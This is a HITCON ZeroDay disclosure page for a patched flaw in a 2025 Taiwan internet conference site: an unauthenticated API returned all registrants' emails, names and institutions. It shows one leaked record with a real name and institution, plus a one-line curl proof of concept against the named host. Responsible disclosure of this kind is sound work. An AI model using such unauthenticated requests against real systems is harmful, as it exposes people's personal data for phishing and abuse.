2025年台灣網際網路研討會未授權 API 存取導致使用者註冊資訊外洩漏洞

Vulnerability Overview

ZDID: ZD-2025-01324
發信 Vendor: 國立宜蘭大學
Title: 2025年台灣網際網路研討會未授權 API 存取導致使用者註冊資訊外洩漏洞
Introduction: 未經身份驗證，可直接呼叫 API POST /API/Account/GetAccounts 取得系統內所有使用者註冊資料（包含 Email、姓名、所屬單位、建立時間等）。

處理狀態

目前狀態

公開

Last Update : 2025/11/04

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2025/10/03 22:23:07 : 新提交 (由康喔KJW 更新此狀態)
2025/10/12 11:59:42 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/10/17 13:38:38 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/10/17 13:38:38 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/10/27 17:21:44 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/11/04 03:00:50 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-01324
通報者：kangjw (康喔KJW)
風險：嚴重
類型：存取控制缺陷 (Broken Access Control)

參考資料

攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料，或連線至高權限使用者的頁面。

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

漏洞概述
該系統 API POST /API/Account/GetAccounts 在不需任何身份驗證或授權（未帶 cookie、token 或授權 header）情況下回傳註冊使用者的完整清單。測試結果顯示可回傳多筆使用者記錄，範例回應如下（節錄）：

{
  "PKNO": 251,
  "Email": "[email protected]",
  "Username": "胡育誠",
  "Institution": "東海大學",
  "NOTE": "",
  "CTime": "2025-09-24T18:10:53.98",
  "UPTime": null,
  "Is_Active": true,
  "Force_password_chang": false
}

重現步驟（PoC）

發送 HTTP POST 要求到 /API/Account/GetAccounts，不帶任何授權資訊。
伺服器回應包含所有註冊帳戶的欄位（Email、Username、Institution、CTime、Is_Active 等）。

可用的最簡 PoC（curl）：

curl -i -X POST "https://tanet2025js.niu.edu.tw/API/Account/GetAccounts" \
  -H "Content-Type: application/json" \
  -d "{}"

（或直接 POST 空 body 或預設 JSON，都會回傳使用者資料）

影響範圍

所有註冊使用者之 Email、姓名、所屬單位、註冊時間與狀態等個人資料被外洩。
攻擊者可藉此進行大規模針對性釣魚、社交工程、或與其他資料做聯合分析（帳號比對、憑證填充測試等）。
若系統內含其他敏感欄位（未被測試但可能存在），風險會更高。

證據／截圖

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

2025年台灣網際網路研討會未授權 API 存取導致使用者註冊資訊外洩漏洞 - HITCON ZeroDay

Vulnerability Detail Report